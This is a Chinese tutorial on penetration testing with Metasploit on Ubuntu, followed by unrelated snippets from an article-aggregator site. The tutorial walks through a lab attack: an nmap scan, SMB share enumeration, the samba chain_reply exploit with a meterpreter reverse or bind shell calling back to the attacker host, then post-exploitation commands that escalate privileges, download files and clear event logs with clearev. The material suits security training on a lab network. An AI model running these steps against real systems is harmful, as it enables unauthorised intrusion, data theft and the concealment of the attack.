实践代码教你学会 Metasploit 渗透攻击【Ubuntu版本】

2023-12-19 12:12

本文主要是介绍实践代码教你学会 Metasploit 渗透攻击【Ubuntu版本】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

    • 一. Metasploit 渗透工具
    • 二. 安装配置
    • 三. 模块讲解
      • 3.1 auxiliary-辅助模块
      • 3.2 exploit-渗透攻击模块
      • 3.3 payload-攻击荷载模块
    • 四. 模拟攻击
      • 4.1 准备工作
      • 4.2 漏洞探测
      • 4.3 漏洞利用
      • 4.4 后渗透操作

一. Metasploit 渗透工具


Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程

二. 安装配置

切换至准备下载软件的目录下

cd /opt

下载

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

msf默认使用的PostgreSQL数据库不能与root用户关联,所以我们需要添加新用户msf,并且每次启动msf,都需要切换用户,否则数据库无法同步

# 添加msf用户
adduser msf
# 切换到msf用户
su msf
# 切换到msf所在的目录
cd  /opt/metasploit-framework/bin
# 启动msfconsole
./msfconsole

在这里插入图片描述

可将metasploit添加至执行目录,往后在任何目录直接msfconsole就可以

ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole

更新msf(可选)

# MSF后期更新升级
msfupdate

三. 模块讲解

3.1 auxiliary-辅助模块


辅助模块

该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。

查看辅助模块

show auxiliary/xxx

3.2 exploit-渗透攻击模块


渗透攻击模块

是利用发现的安全漏洞或配置弱点对远程目标进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问的一个代码模块

查看不同系统的可利用漏洞

search exploits/xxxx

3.3 payload-攻击荷载模块


攻击荷载模块

攻击载荷是渗透目标系统之后完成实际攻击功能的代码,用于在目标系统上运行任意命令或者执行特定代码。

查看可用代码

# 查看可用代码
search payloads/xxxx

组成

  • Single:完全独立的Payload,运行简单,例如添加一个系统用户或删除一份文件。

    • 格式:形如target/single ,如:windows/powershell_bind_tcp
  • Stager:负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。

  • Stage:是Stager下的一种组件,可以提供更加高级的功能

    • 格式:形如target/stage/stager, 如:windows/meterpreter/reverse_tcp,包含一个Stage Payload(meterpreter)和 一个Stager Payload(reverse_tcp)组成。

四. 模拟攻击

4.1 准备工作


被渗透机器:10.137.5.2,先给被渗透的机器安装一些服务,便于被发现

apt-get install vsftpd
apt-get install openssh-server
apt-get install telnet
apt-get install postfix
apt-get install samba

攻击机器为:10.137.5.1,安装namp用作服务和端口扫描

apt-get install nmap

开始扫描目标机器,注意要在root权限下运行命令

# -sS:表示这是一个基本的扫描方式,Nmap发送SYN包到远程主机,但不会在目标主机上产生任何日志记录
# -sV:用来扫描目标主机和端口上运行的软件的版本
# -n:不进行dns解析操作
nmap -sS -sV -n 10.137.5.2

在这里插入图片描述

表示总共运行了如下服务和开启如下端口

服务端口
vsftpd21
Openssh22
smtpd25
samba139 和 445

4.2 漏洞探测


首先进入框架

msfconsole

假设利用samba服务渗透,搜索相关扫描漏洞,选择一个漏洞进行渗透

search scanner/smb

在这里插入图片描述

选择漏洞探测,一般Auxiliary就是负责执行扫描

use auxiliary/scanner/smb/smb_enumshares

查看该模块所需的配置信息

show options

在这里插入图片描述

设置要探测的远程目标

set rhosts 10.137.5.2

对该主机进行渗透攻击,正常情况下,有+号的就是可能存在漏洞的主机

exploit

在这里插入图片描述

4.3 漏洞利用


查找利用漏洞

search linux/samba

在这里插入图片描述

选择漏洞攻击

use linux/samba/chain_reply

查看设置参数

show options

在这里插入图片描述

可以看见我们只需要设置探测的远程目标即可

set rhosts 10.137.5.2

可以看见,已默认选择了一种攻击方式linux/x86/meterpreter/reverse_tcp

在这里插入图片描述
如果不满意,可以查看攻击荷载

show  payloads

在这里插入图片描述
再额外设置攻击荷载,记住要选择了linux版本,例如

set payload payload/linux/x86/shell_bind_tcp

再次查看需配置参数,发现已经被更改

show options

其中lport,表示反弹shell到我们主机的这个端口

在这里插入图片描述

设置回弹主机地址

set lhost 10.137.5.1

进行攻击

exploit

理论上,在这里就已经攻击成功,但是由于版本更新的问题,很多软件已经被修复漏洞,根本无法成功渗透,如需成功渗透,可尝试使用低版本的软件或系统

4.4 后渗透操作


运行成功之后,我们将会看到命令提示符 meterpreter > 出现,输入shell进入目标主机终端

shell

退出终端,回到meterpreter

exit

meterpreter下,我们可以进行如下操作

命令含义命令含义
sysinfo查看主机消息pwd查看当前目录
cd切换文件夹cat查看文件内容
rm删除文件edit编辑文件
ls查看文件详情mkdir创建目录
download file下载文件upload file上传文件
screenshot截图getsystem权限提升

使用完毕getsystem,清除操作日志

clearev

挂载getsystem ,回到msf框架

background

查看保存的shell会话

sessions -l

输入session [id]即可再次进入终端

session 2

这篇关于实践代码教你学会 Metasploit 渗透攻击【Ubuntu版本】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/512114

相关文章

基于MySQL Binlog的Elasticsearch数据同步实践

一、为什么要做 随着马蜂窝的逐渐发展,我们的业务数据越来越多,单纯使用 MySQL 已经不能满足我们的数据查询需求,例如对于商品、订单等数据的多维度检索。 使用 Elasticsearch 存储业务数据可以很好的解决我们业务中的搜索需求。而数据进行异构存储后,随之而来的就是数据同步的问题。 二、现有方法及问题 对于数据同步,我们目前的解决方案是建立数据中间表。把需要检索的业务数据,统一放到一张M

活用c4d官方开发文档查询代码

当你问AI助手比如豆包,如何用python禁止掉xpresso标签时候,它会提示到 这时候要用到两个东西。https://developers.maxon.net/论坛搜索和开发文档 比如这里我就在官方找到正确的id描述 然后我就把参数标签换过来

Android实现任意版本设置默认的锁屏壁纸和桌面壁纸(两张壁纸可不一致)

客户有些需求需要设置默认壁纸和锁屏壁纸  在默认情况下 这两个壁纸是相同的  如果需要默认的锁屏壁纸和桌面壁纸不一样 需要额外修改 Android13实现 替换默认桌面壁纸: 将图片文件替换frameworks/base/core/res/res/drawable-nodpi/default_wallpaper.*  (注意不能是bmp格式) 替换默认锁屏壁纸: 将图片资源放入vendo

poj 1258 Agri-Net(最小生成树模板代码)

感觉用这题来当模板更适合。 题意就是给你邻接矩阵求最小生成树啦。~ prim代码:效率很高。172k...0ms。 #include<stdio.h>#include<algorithm>using namespace std;const int MaxN = 101;const int INF = 0x3f3f3f3f;int g[MaxN][MaxN];int n

系统架构师考试学习笔记第三篇——架构设计高级知识(20)通信系统架构设计理论与实践

本章知识考点:         第20课时主要学习通信系统架构设计的理论和工作中的实践。根据新版考试大纲,本课时知识点会涉及案例分析题(25分),而在历年考试中,案例题对该部分内容的考查并不多,虽在综合知识选择题目中经常考查,但分值也不高。本课时内容侧重于对知识点的记忆和理解,按照以往的出题规律,通信系统架构设计基础知识点多来源于教材内的基础网络设备、网络架构和教材外最新时事热点技术。本课时知识

计算机毕业设计 大学志愿填报系统 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试

🍊作者:计算机编程-吉哥 🍊简介:专业从事JavaWeb程序开发,微信小程序开发,定制化项目、 源码、代码讲解、文档撰写、ppt制作。做自己喜欢的事,生活就是快乐的。 🍊心愿:点赞 👍 收藏 ⭐评论 📝 🍅 文末获取源码联系 👇🏻 精彩专栏推荐订阅 👇🏻 不然下次找不到哟~Java毕业设计项目~热门选题推荐《1000套》 目录 1.技术选型 2.开发工具 3.功能

pico2 开发环境搭建-基于ubuntu

pico2 开发环境搭建-基于ubuntu 安装编译工具链下载sdk 和example编译example 安装编译工具链 sudo apt install cmake gcc-arm-none-eabi libnewlib-arm-none-eabi libstdc++-arm-none-eabi-newlib 注意cmake的版本,需要在3.17 以上 下载sdk 和ex

代码随想录冲冲冲 Day39 动态规划Part7

198. 打家劫舍 dp数组的意义是在第i位的时候偷的最大钱数是多少 如果nums的size为0 总价值当然就是0 如果nums的size为1 总价值是nums[0] 遍历顺序就是从小到大遍历 之后是递推公式 对于dp[i]的最大价值来说有两种可能 1.偷第i个 那么最大价值就是dp[i-2]+nums[i] 2.不偷第i个 那么价值就是dp[i-1] 之后取这两个的最大值就是d

pip-tools:打造可重复、可控的 Python 开发环境,解决依赖关系,让代码更稳定

在 Python 开发中,管理依赖关系是一项繁琐且容易出错的任务。手动更新依赖版本、处理冲突、确保一致性等等,都可能让开发者感到头疼。而 pip-tools 为开发者提供了一套稳定可靠的解决方案。 什么是 pip-tools? pip-tools 是一组命令行工具,旨在简化 Python 依赖关系的管理,确保项目环境的稳定性和可重复性。它主要包含两个核心工具:pip-compile 和 pip

D4代码AC集

贪心问题解决的步骤: (局部贪心能导致全局贪心)    1.确定贪心策略    2.验证贪心策略是否正确 排队接水 #include<bits/stdc++.h>using namespace std;int main(){int w,n,a[32000];cin>>w>>n;for(int i=1;i<=n;i++){cin>>a[i];}sort(a+1,a+n+1);int i=1